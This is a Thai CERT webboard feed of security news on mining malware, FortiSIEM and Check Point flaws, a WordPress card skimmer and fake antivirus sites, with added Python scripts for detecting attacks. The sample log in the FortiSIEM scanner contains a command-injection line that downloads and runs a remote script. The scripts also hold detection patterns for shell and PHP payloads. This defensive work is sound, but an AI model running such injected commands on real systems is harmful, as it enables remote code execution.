NCSA Webboard
    Posts created by NCSA

    • Decoding Water Sigbin's Latest Obfuscation Tricks

      Water Sigbin (aka the 8220 Gang) is a China-based threat actor that has been active since at least 2017. It focuses on deploying cryptocurrency-mining malware, primarily in cloud-based environments and Linux servers. The group has been known to integrate vulnerability exploitation as part of its wide array of TTPs. In our previous discussion on the group's tactics, we looked into how it operates using ever-evolving and complex methods. However, cyberthreats rarely remain stagnant, with threat actors constantly finding new ways to outsmart defenders. Recently, we've observed Water Sigbin using new techniques and methods to hide its activities, making the group's attacks more difficult to defend against. We found the threat actor exploiting the Oracle WebLogic Server vulnerabilities CVE-2017-3506 (a vulnerability allowing remote OS command execution) and CVE-2023-21839 (an insecure deserialization vulnerability) to deploy a cryptocurrency miner via a PowerShell script named bin.ps1 on the victim host. Upon closer examination of the group's tools, tactics and procedures (TTPs), we determined the exploitation to be the work of Water Sigbin, indicating that it is continuously updating its deployment scripts and tools. We found exploitation attempts on both Linux and Windows machines, with the threat actor deploying shell scripts on the former and a PowerShell script on the latter. For our analysis, we will refer to the techniques used in the Windows version of the exploitation, which shows a noteworthy obfuscation technique used by Water Sigbin.

      News source
      https://www.trendmicro.com/en_us/research/24/e/decoding-8220-latest-obfuscation-tricks.html


      Posted in Cyber Security News
      NCSA_THAICERT
    • TP-Link fixes critical RCE vulnerability in the popular C5400X gaming router

      You can follow the news on the webboard or on Facebook NCSA Thailand

      Posted in Cyber Security News
      NCSA_THAICERT
    • New ATM malware family advertised for sale on underground cybercrime websites

      You can follow the news on the webboard or on Facebook NCSA Thailand

      Posted in Cyber Security News
      NCSA_THAICERT
    • PoC Exploits for Critical FortiSIEM Command Execution Flaws Released (CVE-2024-23108, CVE-2023-34992)

      FortiSIEM helps customers build an inventory of their organization’s assets, it aggregates logs and correlates information for threat detection and hunting, and allows automated response and remediation. CVE-2024-23108 and CVE-2024-23109 are OS command injection vulnerabilities in the FortiSIEM supervisor and can be exploited remotely, without authentication, with specially crafted API requests. Both flagged by Zach Hanley of Horizon3.ai, they are variants/patch bypasses of CVE-2023-34992, which Fortinet fixed in October 2023. The two variants were fixed in January 2024, and admins were advised to upgrade. (Fortinet created some confusion regarding CVE-2024-23108 and CVE-2024-23109 because it initially stated that the two CVEs were assigned erroneously, then later said that they were variants of CVE-2023-34992. An email Hanley received from Fortinet PSIRT confirmed the assigned CVEs.) PoCs for CVE-2024-23108 and CVE-2023-34992 have been published by Hanley on GitHub. Hanley has noted that “there is very little difference in the exploitation of the previous command injection, CVE-2023-34992, to this one, CVE-2024-23108, reported 6 months later”, and said that attempts to exploit them will leave evidence in the logs for the phMonitor service. For example, attempts to exploit CVE-2024-23108 will leave a log message containing a failed command with datastore[.]py nfs test. Admins should check their FortiSIEM installations and (if they haven’t already) upgrade to a version containing the fix. Vulnerabilities in Fortinet solutions are often leveraged by attackers in the wild, but there is no mention yet of these ones being exploited.

      News source
      https://www.helpnetsecurity.com/2024/05/29/cve-2024-23108-cve-2023-34992-poc/


      Posted in Cyber Security News
      NCSA_THAICERT
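Hunting for the phMonitor artefact described in the post above, as an added example that is not part of the original post or of Horizon3.ai's published PoC: the script scans log text for failed commands containing `datastore.py nfs test` and marks the ones carrying shell metacharacters, which is what separates an injection attempt from an ordinary failed NFS check. The sample lines, the `phMonitor:` prefix, the timestamp layout and the function names are constructed assumptions, not the real FortiSIEM log format.

```python
import re

# Constructed sample of phMonitor-style log lines (illustrative only; the real
# FortiSIEM log layout is an assumption here). The indicator itself, a failed
# command containing "datastore.py nfs test", is the one the post describes.
SAMPLE_LOG = """\
2024-05-28 09:58:02 phMonitor: INFO  scheduled health check OK
2024-05-28 10:05:43 phMonitor: ERROR failed command: datastore.py nfs test 10.0.0.5:/export ; id
2024-05-28 10:05:44 phMonitor: ERROR failed command: datastore.py nfs test $(curl http://198.51.100.7/x.sh|sh)
2024-05-28 10:06:10 phMonitor: ERROR failed command: datastore.py nfs test 10.0.0.9:/backups
2024-05-28 10:07:00 phMonitor: INFO  scheduled health check OK
"""

INDICATOR = re.compile(r"failed command:\s*(?P<cmd>.*datastore\.py\s+nfs\s+test.*)$")
# Characters an attacker needs to break out of the intended "nfs test <share>"
# argument into an additional OS command.
SHELL_META = re.compile(r"[;|&`$(){}<>\n]")
TIMESTAMP = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})")


def find_nfs_test_injections(log_text: str) -> list[dict]:
    """Return one finding per log line that carries the CVE-2024-23108 /
    CVE-2023-34992 indicator. 'likely_injection' is True when the failed
    command contains shell metacharacters; a plain failed NFS test (e.g. an
    unreachable share) is reported too, but with likely_injection=False."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        m = INDICATOR.search(line)
        if not m:
            continue
        cmd = m.group("cmd").strip()
        ts = TIMESTAMP.match(line)
        findings.append({
            "line_no": line_no,
            "timestamp": ts.group("ts") if ts else None,
            "command": cmd,
            "likely_injection": bool(SHELL_META.search(cmd)),
        })
    return findings


def summarize(findings: list[dict]) -> dict:
    """Counts used for a quick triage verdict."""
    injections = [f for f in findings if f["likely_injection"]]
    return {"indicator_hits": len(findings), "likely_injections": len(injections)}


if __name__ == "__main__":
    hits = find_nfs_test_injections(SAMPLE_LOG)
    for f in hits:
        flag = "INJECTION?" if f["likely_injection"] else "benign-looking"
        print(f"line {f['line_no']} {f['timestamp']} [{flag}] {f['command']}")
    print(summarize(hits))
```

Run it against exported phMonitor log text; a hit without metacharacters still deserves a look, since a failed NFS test is also what a probe with a broken payload leaves behind.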
    • Check Point Releases Emergency Fix for VPN Zero-Day Exploited in Attacks

      Check Point has released hotfixes for a VPN zero-day vulnerability exploited in attacks to gain remote access to firewalls and attempt to breach corporate networks. On Monday, the company first warned about a spike in attacks targeting VPN devices, sharing recommendations on how admins can protect their devices. Later, it discovered the source of the problem, a zero-day flaw that hackers exploited against its customers. Tracked as CVE-2024-24919, the high-severity information disclosure vulnerability enables attackers to read certain information on internet-exposed Check Point Security Gateways with Remote Access VPN or Mobile Access Software Blades enabled. "The vulnerability potentially allows an attacker to read certain information on Internet-connected Gateways with remote access VPN or mobile access enabled," reads an update on Check Point's previous advisory. "The attempts we've seen so far, as previously alerted on May 27, focus on remote access scenarios with old local accounts with unrecommended password-only authentication." CVE-2024-24919 impacts CloudGuard Network, Quantum Maestro, Quantum Scalable Chassis, Quantum Security Gateways, and Quantum Spark Appliances, in the product versions: R80.20.x, R80.20SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, and R81.20.

      News source
      https://www.bleepingcomputer.com/news/security/check-point-releases-emergency-fix-for-vpn-zero-day-exploited-in-attacks/


      Posted in Cyber Security News
      NCSA_THAICERT
    • Attackers Are Probing Check Point Remote Access VPN Devices

      Attackers are trying to gain access to Check Point VPN devices via local accounts protected only by passwords, the company warned on Monday. Their ultimate goal is to use that access to discover and pivot to other enterprise assets and users, and gain persistence in enterprise environments. In mid-April 2024, Cisco Talos warned about a global increase in brute-force attacks against VPN services, web application authentication interfaces and SSH services. The devices targeted in these attacks were those by Cisco, Check Point, Fortinet and SonicWall (VPNs), as well as by MikroTik, Draytek, and Ubiquiti. The attempts were coming from IP addresses associated with proxy services, and were trying out combinations of most likely usernames and common passwords, such as "Passw0rd", "qwerty", "test123", etc. Check Point now says that they have also recently witnessed compromised VPN solutions, including those by various cyber security vendors.

      News source
      https://www.helpnetsecurity.com/2024/05/28/attackers-target-check-point-vpn/


      Posted in Cyber Security News
      NCSA_THAICERT
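The credential brute-forcing described in the post above, seen from the defender's side, as an added example that is not from the original post, Check Point or Cisco Talos: it parses constructed VPN authentication log lines and flags a source address that fails logins against many distinct usernames inside a short window, the signature of a password spray that works through likely usernames with common passwords. The log format, the `vpn-gw` host name, the thresholds and the function names are assumptions, not any vendor's real syslog layout.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed VPN authentication log lines (illustrative; the format is an
# assumption, not a real vendor syslog layout). 203.0.113.10 walks through
# likely usernames; 198.51.100.4 is a real user who mistyped twice.
SAMPLE_AUTH_LOG = """\
2024-05-27T08:00:01Z vpn-gw auth result=fail user=admin src=203.0.113.10
2024-05-27T08:00:03Z vpn-gw auth result=fail user=test src=203.0.113.10
2024-05-27T08:00:05Z vpn-gw auth result=fail user=support src=203.0.113.10
2024-05-27T08:00:07Z vpn-gw auth result=fail user=guest src=203.0.113.10
2024-05-27T08:00:09Z vpn-gw auth result=fail user=vpn src=203.0.113.10
2024-05-27T08:00:12Z vpn-gw auth result=fail user=administrator src=203.0.113.10
2024-05-27T08:00:15Z vpn-gw auth result=fail user=admin src=203.0.113.10
2024-05-27T08:01:00Z vpn-gw auth result=fail user=jsmith src=198.51.100.4
2024-05-27T08:01:20Z vpn-gw auth result=fail user=jsmith src=198.51.100.4
2024-05-27T08:01:40Z vpn-gw auth result=ok user=jsmith src=198.51.100.4
2024-05-27T08:10:00Z vpn-gw auth result=fail user=admin src=203.0.113.10
"""

LINE = re.compile(
    r"^(?P<ts>\S+) \S+ auth result=(?P<result>\w+) user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def parse_auth_log(text: str) -> list[dict]:
    """Turn the constructed log format into event dicts; unknown lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "result": m["result"], "user": m["user"], "src": m["src"],
        })
    return events


def detect_spraying(events: list[dict], window: timedelta = timedelta(minutes=5),
                    min_users: int = 5) -> dict:
    """Flag a source IP when, inside any sliding window of length `window`, it
    produces failed logins for at least `min_users` distinct usernames. A user
    who forgot a password fails on one account, so counting distinct usernames
    rather than raw failures separates spraying from ordinary mistakes."""
    by_src = defaultdict(list)
    for e in events:
        if e["result"] == "fail":
            by_src[e["src"]].append(e)
    alerts = {}
    for src, fails in by_src.items():
        fails.sort(key=lambda e: e["ts"])
        start = 0
        for end, e in enumerate(fails):
            # Slide the window start forward until it covers only `window` of history.
            while fails[start]["ts"] < e["ts"] - window:
                start += 1
            users = {f["user"] for f in fails[start:end + 1]}
            if len(users) >= min_users:
                a = alerts.setdefault(src, {"users": set(), "failures": 0,
                                            "first": fails[start]["ts"], "last": e["ts"]})
                a["users"] |= users
                a["last"] = e["ts"]
        if src in alerts:
            alerts[src]["failures"] = len(fails)
    return alerts


if __name__ == "__main__":
    for src, a in detect_spraying(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(f"{src}: {len(a['users'])} usernames, {a['failures']} failures, "
              f"{a['first']:%H:%M:%S} to {a['last']:%H:%M:%S}")
```

Tune `window` and `min_users` to the gateway's normal traffic; a slow spray spread over hours needs a longer window, and the same logic applies unchanged to SSH or web-login logs once the parser is swapped.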
    • CISA adds one known exploited vulnerability to catalog

      The Cybersecurity and Infrastructure Security Agency (CISA) has announced the addition of one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.

      • CVE-2024-5274 Google Chromium V8 Type Confusion Vulnerability

      These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats.
      CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities. Read the full advisory at
      https://www.cisa.gov/news-events/alerts/2024/05/28/cisa-adds-one-known-exploited-vulnerability-catalog


      You can follow the news on the webboard or on Facebook NCSA Thailand

      Posted in Cyber Security News
      NCSA_THAICERT
    • CISA releases one Industrial Control Systems advisory

      The Cybersecurity and Infrastructure Security Agency (CISA) released one Industrial Control Systems (ICS) advisory on 28 May 2024. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS, as follows:

      • ICSA-24-149-01 Campbell Scientific CSI Web Server

      CISA encourages users and administrators to review the newly released ICS advisory for technical details and mitigations. More details at https://www.cisa.gov/news-events/alerts/2024/05/28/cisa-releases-one-industrial-control-systems-advisory


      You can follow the news on the webboard or on Facebook NCSA Thailand

      Posted in OT Cyber Security News
      NCSA_THAICERT
    • WordPress Plugin Exploited to Steal Credit Card Data from E-commerce Sites

      Unknown threat actors are abusing lesser-known code snippet plugins for WordPress to insert malicious PHP code in victim sites that are capable of harvesting credit card data. The campaign, observed by Sucuri on May 11, 2024, entails the abuse of a WordPress plugin called Dessky Snippets, which allows users to add custom PHP code. It has over 200 active installations. Such attacks are known to leverage known flaws in WordPress plugins or easily guessable credentials to gain administrator access and install other plugins (legitimate or otherwise) for post-exploitation. Sucuri said the Dessky Snippets plugin is used to insert a server-side PHP credit card skimming malware on compromised sites and steal financial data. "This malicious code was saved in the dnsp_settings option in the WordPress wp_options table and was designed to modify the checkout process in WooCommerce by manipulating the billing form and injecting its own code," security researcher Ben Martin said. Specifically, it's designed to add several new fields to the billing form that request credit card details, including names, addresses, credit card numbers, expiry dates, and Card Verification Value (CVV) numbers, which are then exfiltrated to the URL "hxxps://2of[.]cc/wp-content/." A noteworthy aspect of the campaign is that the billing form associated with the bogus overlay has its autocomplete attribute disabled (i.e., autocomplete="off"). "By manually disabling this feature on the fake checkout form it reduces the likelihood that the browser will warn the user that sensitive information is being entered, and ensures that the fields stay blank until manually filled out by the user, reducing suspicion and making the fields appear as regular, necessary inputs for the transaction," Martin said. This is not the first time threat actors have resorted to using legitimate code snippet plugins for malicious purposes. Last month, the company revealed the abuse of the WPCode code snippet plugin to inject malicious JavaScript code into WordPress sites in order to redirect site visitors to VexTrio domains.

      News source
      https://thehackernews.com/2024/05/wordpress-plugin-exploited-to-steal.html


      Posted in Cyber Security News
      NCSA_THAICERT
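Two checks for the skimmer pattern described in the post above, as an added example that is neither Sucuri's code nor part of the Dessky Snippets plugin: one parses a checkout page and reports input fields that look like card-data fields with autocomplete="off", the other scans wp_options rows for snippet-plugin code (the dnsp_settings option named in the post) that calls eval/base64_decode or hooks the WooCommerce checkout fields filter. The HTML fragment, the option rows, the PHP snippet and the function names are constructed assumptions; woocommerce_checkout_fields is the real WooCommerce filter name.

```python
import re
from html.parser import HTMLParser

# Constructed WooCommerce-style checkout fragment (illustrative only). The
# three "billing_card_*" inputs imitate what the post describes: card data
# requested on the merchant's own page, with autocomplete switched off.
SAMPLE_CHECKOUT_HTML = """
<form name="checkout" method="post" class="checkout woocommerce-checkout">
  <input type="text" name="billing_first_name" autocomplete="given-name">
  <input type="text" name="billing_address_1" autocomplete="address-line1">
  <input type="text" name="billing_card_number" placeholder="Card number" autocomplete="off">
  <input type="text" name="billing_card_exp" placeholder="MM/YY" autocomplete="off">
  <input type="text" name="billing_card_cvv" placeholder="CVV" autocomplete="off">
  <input type="hidden" name="woocommerce-process-checkout-nonce" value="abc">
</form>
"""

# Constructed (option_name, option_value) rows standing in for a wp_options
# dump. The dnsp_settings row mimics PHP stored by a snippet plugin that hooks
# the checkout and hides its real payload behind eval(base64_decode()).
SAMPLE_WP_OPTIONS = [
    ("siteurl", "https://shop.example"),
    ("dnsp_settings", 'add_filter("woocommerce_checkout_fields", function($f){ '
                      '$f["billing"]["billing_card_number"] = array("type" => "text"); '
                      'eval(base64_decode($payload)); return $f; });'),
    ("blogname", "Example Shop"),
]

CARD_FIELD = re.compile(r"(card|ccnum|cc_num|cvv|cvc|csc|expir|_exp\b|\bpan\b)", re.I)


class CheckoutInputScanner(HTMLParser):
    """Collect <input> elements whose name/id/placeholder suggests card data
    and whose autocomplete attribute is "off", the combination the post describes."""
    def __init__(self):
        super().__init__()
        self.suspicious = []

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = dict(attrs)
        label = " ".join(filter(None, (a.get("name"), a.get("id"), a.get("placeholder"))))
        if CARD_FIELD.search(label) and (a.get("autocomplete") or "").lower() == "off":
            self.suspicious.append(a.get("name") or a.get("id") or "<unnamed>")


def find_injected_card_fields(html: str) -> list[str]:
    """Names of card-looking inputs with autocomplete="off" on a checkout page."""
    p = CheckoutInputScanner()
    p.feed(html)
    return p.suspicious


# PHP constructs worth a second look when they appear inside a stored snippet.
SUSPICIOUS_PHP = re.compile(
    r"\b(eval|base64_decode|gzinflate|str_rot13|file_put_contents|curl_exec)\s*\(", re.I)
CHECKOUT_HOOK = re.compile(r"woocommerce_checkout_fields|woocommerce_after_checkout_billing_form")


def scan_snippet_options(rows, watch=("dnsp_settings",)) -> list[tuple]:
    """Return (option_name, reasons) for rows holding snippet code with dangerous
    calls or a checkout hook. `watch` lists option names used by snippet plugins;
    a watched option with harmless content is not reported on its own."""
    hits = []
    for name, value in rows:
        reasons = ["snippet-plugin option"] if name in watch else []
        reasons += [f"calls {m.lower()}()" for m in sorted(set(SUSPICIOUS_PHP.findall(value)))]
        if CHECKOUT_HOOK.search(value):
            reasons.append("hooks WooCommerce checkout")
        if any(r != "snippet-plugin option" for r in reasons):
            hits.append((name, reasons))
    return hits


if __name__ == "__main__":
    print("injected card fields:", find_injected_card_fields(SAMPLE_CHECKOUT_HTML))
    for name, reasons in scan_snippet_options(SAMPLE_WP_OPTIONS):
        print(f"{name}: {', '.join(reasons)}")
```

Feed the first check the rendered checkout page (a server-side skimmer only shows up in the HTML the server emits, not in the theme files) and the second a `wp_options` export; a legitimate store never asks for a card number in its own billing form when payment is handled by a gateway, so any hit from the first check is worth an immediate look.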
    • Fake Antivirus Sites Spread Malware Disguised as Avast, MalwareBytes, BitDefender

      In April 2024, Trellix Advanced Research Center team members discovered several fake antivirus sites hosting sophisticated malicious files like APK, EXE, and Inno Setup installers. These sites are used to distribute the SpyNote trojan, Lumma malware, and StealC malware. The malware hosts include avast-securedownload[.]com, bitdefender-app[.]com, and malwarebytes[.]pro. The first hosts a sophisticated APK called Avast.apk that delivers the SpyNote Trojan, which can install and delete packages, read call logs, SMS, contacts, storage data, phone state, and more. It also has a recorder, touch activity tracker, and update capabilities. Bitdefender-app[.]com delivers a zip file with an EXE named "setup-win-x86-x64[.]exe[.]zip" with a discreet TLS callback function. It delivers Lumma malware, targeting sensitive information like PC name, username, HWID, screen resolution, CPU, installed memory, running processes, login data, history, cookies, tokens, and user profile information. Malwarebytes[.]pro delivers RAR files containing legitimate DLLs, Inno Setup, and StealC infostealing malware. The contents are compressed in gzip and transferred to the attacker's C2 server. The stolen information includes account tokens, Steam tokens, saved card details, system profiles, Telegram logins, running process names, installed browser lists, and common system information.

      News source
      https://www.hackread.com/fake-antivirus-sites-malware-avast-malwarebytes-bitdefender/


      Posted in Cyber Security News
      NCSA_THAICERT
    • Cyber Threat Intelligence 29 May 2024
      Industrial Sector
      • Campbell Scientific CSI Web Server
        "Successful exploitation of these vulnerabilities could allow an attacker to download files and decode stored passwords."
        https://www.cisa.gov/news-events/ics-advisories/icsa-24-149-01
      Vulnerabilities
      • Exploit Released For Maximum Severity Fortinet RCE Bug, Patch Now
        "Security researchers have released a proof-of-concept (PoC) exploit for a maximum-severity vulnerability in Fortinet's security information and event management (SIEM) solution, which was patched in February. Tracked as CVE-2024-23108, this security flaw is a command injection vulnerability discovered and reported by Horizon3 vulnerability expert Zach Hanley that enables remote command execution as root without requiring authentication."
        https://www.bleepingcomputer.com/news/security/exploit-released-for-maximum-severity-fortinet-rce-bug-patch-now/
        https://securityaffairs.com/163797/hacking/fortinet-siem-critical-rce-poc.html

      • CISA Adds One Known Exploited Vulnerability To Catalog
        "CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation."
        https://www.cisa.gov/news-events/alerts/2024/05/28/cisa-adds-one-known-exploited-vulnerability-catalog

      • Unauthenticated XSS Vulnerability Patched In Slider Revolution Plugin
        "Slider Revolution came to us with a request to audit their product for potential vulnerabilities since they wanted to make sure that their users’ websites were not vulnerable to an attack. This blog post discusses our audit findings, which we have been authorized to publicize. If you're a Slider Revolution user, please update the plugin to version 6.7.11 or higher."
        https://patchstack.com/articles/unauthenticated-xss-vulnerability-patched-in-slider-revolution-plugin/
        https://www.infosecurity-magazine.com/news/xss-flaws-wordpress-plugin-slider/

      Malware
      • Server Side Credit Card Skimmer Lodged In Obscure Plugin
        "Attackers are always finding new ways to inject malware into websites and new ways to obscure it to avoid detection, but they’re always up to their same old tricks. In this post, we’ll explore how attackers are using a very obscure PHP snippet WordPress plugin to install server-side malware to harvest credit card details from a WooCommerce online store."
        https://blog.sucuri.net/2024/05/server-side-credit-card-skimmer-lodged-in-obscure-plugin.html
        https://thehackernews.com/2024/05/wordpress-plugin-exploited-to-steal.html
        https://securityaffairs.com/163777/malware/wordpress-plugin-insert-e-skimmer.html

      • Technical Analysis Of Anatsa Campaigns: An Android Banking Malware Active In The Google Play Store
        "At Zscaler ThreatLabz, we regularly monitor the Google Play store for malicious applications. Over the past few months, we identified and analyzed more than 90 malicious applications uploaded to the Google Play store. These malware-infected applications have collectively garnered over 5.5 million installs."
        https://www.zscaler.com/blogs/security-research/technical-analysis-anatsa-campaigns-android-banking-malware-active-google
        https://www.bleepingcomputer.com/news/security/over-90-malicious-android-apps-with-55m-installs-found-on-google-play/
        https://www.darkreading.com/endpoint-security/90-malicious-apps-55-million-downloads-google-play
        https://www.infosecurity-magazine.com/news/teabot-banking-trojan-activity/

      • Moonstone Sleet Emerges As New North Korean Threat Actor With New Bag Of Tricks
        "Microsoft has identified a new North Korean threat actor, now tracked as Moonstone Sleet (formerly Storm-1789), that uses both a combination of many tried-and-true techniques used by other North Korean threat actors and unique attack methodologies to target companies for its financial and cyberespionage objectives. Moonstone Sleet is observed to set up fake companies and job opportunities to engage with potential targets, employ trojanized versions of legitimate tools, create a malicious game, and deliver a new custom ransomware."
        https://www.microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/
        https://www.bleepingcomputer.com/news/microsoft/microsoft-links-moonstone-sleet-north-korean-hackers-to-new-fakepenny-ransomware/
        https://www.bankinfosecurity.com/microsoft-warns-north-koreas-moonstone-sleet-a-25344

      • Threats That Hide In Your Microsoft Office Documents
        "Microsoft Office documents in the Office365 software suite have become a mainstay for many users who need to create documents for business reports, college essays, resumes, essential notetaking, and even strategic analyses. Office documents offer a wide range of not only text but data editing software solutions that include technologies that introduce algorithmic logic via a macro or, more recently, with the integration of Python scripting being added to Excel for a more dynamic and logical way of interpreting, editing, and displaying data."
        https://cofense.com/blog/threats-that-hide-in-your-microsoft-office-documents/

      • CatDDoS-Related Gangs Have Seen a Recent Surge In Activity
        "XLab's CTIA (Cyber Threat Insight Analysis) System continuously tracks and monitors the active mainstream DDoS botnets. Recently, our system has observed that CatDDoS-related gangs remain active and have exploited over 80 vulnerabilities over the last three months. Additionally, the maximum number of targets has been observed to exceed 300+ per day. So we decided to share some recent data with the community for reference."
        https://blog.xlab.qianxin.com/catddos-derivative-en/
        https://thehackernews.com/2024/05/researchers-warn-of-catddos-botnet-and.html
        https://www.darkreading.com/cyberattacks-data-breaches/catddos-threat-groups-sharply-ramp-up-ddos-attacks

      • Breach Forums Return To Clearnet And Dark Web Despite FBI Seizure
        "Breach Forums returns to the clearnet and dark web just two weeks after the FBI seized its infrastructure and arrested two administrators. One of the admins, ShinyHunters, regained domains despite the FBI’s efforts, highlighting significant operational setbacks and security lapses."
        https://www.hackread.com/breach-forums-return-clearnet-dark-web-fbi-seizure/
        https://www.theregister.com/2024/05/28/breachforums_back_online/

      • Trusted Relationship Attacks: Trust, But Verify
        "IT outsourcing market continues to demonstrate strong growth globally – such services are becoming increasingly popular. But along with the advantages, such as saved time and resources, delegating non-core tasks creates new challenges in terms of information security. By providing third-party companies (service providers or contractors) with access to their infrastructure, businesses increase the risk of trusted relationship attacks – T1199 in the MITRE ATT&CK classification."
        https://securelist.com/trusted-relationship-attack/112731/

      • From Origins To Operations: Understanding Black Basta Ransomware
        "Since its emergence in 2022, Black Basta has targeted over 500 organizations worldwide, leveraging sophisticated tactics to become a leading ransomware threat. Here’s a look at their methods of operation, notable attacks, and the potential future of this formidable cybercriminal group."
        https://flashpoint.io/blog/understanding-black-basta-ransomware/

      • SharpPanda APT Targets Malaysia With Backdoor Malware
        "In a recent analysis conducted in March and April 2024, the NetbyteSEC Detecx (NBS) team exposed a sophisticated malware campaign orchestrated by the notorious SharpPanda APT group, specifically aimed at targets in Malaysia. The malicious executable, disguised as a harmless Microsoft Word document titled “REKOD MINIT KSN KEPADA YAB PM 2023 – 15.exe,” was designed to establish a backdoor connection, granting attackers unauthorized access to compromised systems."
        https://securityonline.info/sharppanda-apt-targets-malaysia-with-backdoor-malware/
        https://notes.netbytesec.com/2024/05/inside-sharppandas-malware-targeting.html

      Breaches/Hacks/Leaks
      • First American December Data Breach Impacts 44,000 People
        "First American Financial Corporation, the second-largest title insurance company in the United States, revealed Tuesday that a December cyberattack led to a breach impacting 44,000 individuals. Founded in 1889, it provides financial and settlement services to real estate professionals, home buyers, and sellers involved in residential and commercial property transactions. The California-based company has over 21,000 employees and reported a total revenue of $6 billion last year."
        https://www.bleepingcomputer.com/news/security/first-american-december-data-breach-impacts-44-000-people/

      • Hackers Claim Ticketmaster Data Breach: 560M Users’ Info For Sale At $500K
        "ShinyHunters hacking group has claimed to have breached Ticketmaster, stealing the personal data of 560 million users. The 1.3 TB of stolen data also includes payment details. Learn more about this major cybersecurity incident and its implications."
        https://www.hackread.com/hackers-ticketmaster-data-breach-560m-users-sale/

      • ABN Amro Client Data Possibly Stolen In AddComm Ransomware Attack
        "Dutch bank ABN Amro says client data may have been compromised in a ransomware attack at third-party services provider AddComm. The third-party provider announced that the incident has been contained and that the attackers no longer have access to its systems, which have since been restored, but could not confirm what type of data may have been stolen during the attack."
        https://www.securityweek.com/abn-amro-client-data-possibly-stolen-in-addcomm-ransomware-attack/

      • Ransomware Attack On Seattle Public Library Knocks Out Online Systems
        "A ransomware attack on the Seattle Public Library has brought services to a halt — knocking out the wireless network, computers for staff and patrons, and the entire online catalog. The incident began on Saturday, the organization said in a statement on Monday afternoon. The library has 27 different branches serving nearly 800,000 residents."
        https://therecord.media/ransomware-attack-seattle-knocks-out

      • Major Russian Delivery Company Down For Three Days Due To Cyberattack
        "A little-known hacker group claimed responsibility for an attack that has disrupted service for days at CDEK, one of Russia’s largest delivery companies. The Russian-speaking hackers, who call themselves Head Mare, said they encrypted the company’s servers with ransomware and destroyed backup copies of its corporate systems."
        https://therecord.media/russian-delivery-company-cdek-down-cyberattack

      • Christie’s Confirms Breach After RansomHub Threatens To Leak Data
        "Christie's confirmed that it suffered a security incident earlier this month after the RansomHub extortion gang claimed responsibility and threatened to leak stolen data. Christie's is a prominent auction house with a history spanning 2.5 centuries. It operates in 46 countries and specializes in selling art, luxury items, and high-valued collectibles."
        https://www.bleepingcomputer.com/news/security/christies-confirms-breach-after-ransomhub-threatens-to-leak-data/
        https://therecord.media/christies-cyberattack-ransomhub-claims
        https://www.securityweek.com/christies-confirms-data-breach-after-ransomware-group-claims-attack/
        https://securityaffairs.com/163808/cyber-crime/christie-data-breach.html
        https://www.nytimes.com/2024/05/27/arts/design/hackers-claim-christies-attack.html
        https://www.theregister.com/2024/05/28/christies_confirms_cybercriminals_stole_client/

      General News
      • The Evolution Of Security Metrics For NIST CSF 2.0
        "CISOs have long been spreadsheet aficionados, soaking up metrics and using them as KPIs for security progress. These metrics have traditionally measured specific systems or single indicators — vulnerabilities detected, percentage of vulnerabilities patched, software and hardware asset inventory coverage, etc. The NIST Cybersecurity Framework (CSF) 2.0 underscored that metrics like these alone are insufficient and probably even improper when used as proxies for security outcomes."
        https://www.helpnetsecurity.com/2024/05/28/cisos-security-metrics-nist-csf-2-0/

      • How To Combat Alert Fatigue In Cybersecurity
        "In this Help Net Security interview, Ken Gramley, CEO at Stamus Networks, discusses the primary causes of alert fatigue in cybersecurity and DevOps environments. Alert fatigue results from the overwhelming volume of event data generated by security tools, the prevalence of false positives, and the lack of clear event prioritization and actionable guidance."
        https://www.helpnetsecurity.com/2024/05/28/ken-gramley-stamus-networks-alert-fatigue/

      • Widespread Data Silos Slow Down Security Response Times
        "Although the goals and challenges of IT and security professionals intersect, 72% report security data and IT data are siloed in their organization, which contributes to corporate misalignment and elevated security risk, according to Ivanti."
        https://www.helpnetsecurity.com/2024/05/28/data-silos-problem-for-organizations/

      • 34% Of Organizations Lack Cloud Cybersecurity Skills
        "Incident response today is too time consuming and manual, leaving organizations vulnerable to damage due to their inability to efficiently investigate and respond to identified threats, according to Cado Security."
        https://www.helpnetsecurity.com/2024/05/28/cloud-visibility-challenges/

      • #Infosec2024: Why Human Risk Management Is Cybersecurity's Next Step For Awareness
        "Amid frequent warnings about the advanced capabilities of cyber threat actors, targeting human frailties remains the primary initial access method for attackers. This reality has led to the development of human risk management (HRM), a concept that places a focus on targeted, intelligence led interventions to improve security behaviors."
        https://www.infosecurity-magazine.com/news/human-risk-management/

      • Take Two APIs And Call Me In The Morning: How Healthcare Research Can Cure Cyber Crime
        "Some ideas work better than others. Take DARPA, the US Defense Advanced Research Projects Agency. Launched by US President Dwight Eisenhower in 1957 in response to Sputnik, its job is to create and test concepts that may be useful in thwarting enemies. Along the way, it's helped make happen GPS, weather satellites, PC technology, and something called the internet."
        https://www.theregister.com/2024/05/28/take_two_apis_and_call/

      • US Govt Sanctions Cybercrime Gang Behind Massive 911 S5 Botnet
        "The U.S. Treasury Department has sanctioned a cybercrime network comprising three Chinese nationals and three Thailand-based companies linked to a massive botnet controlling a residential proxy service known as "911 S5." Researchers at the Canadian University of Sherbrooke revealed almost two years ago, in June 2022, that this illegitimate residential proxy service lured potential victims by offering free VPN services to install malware designed to add their IP addresses to the 911 S5 botnet."
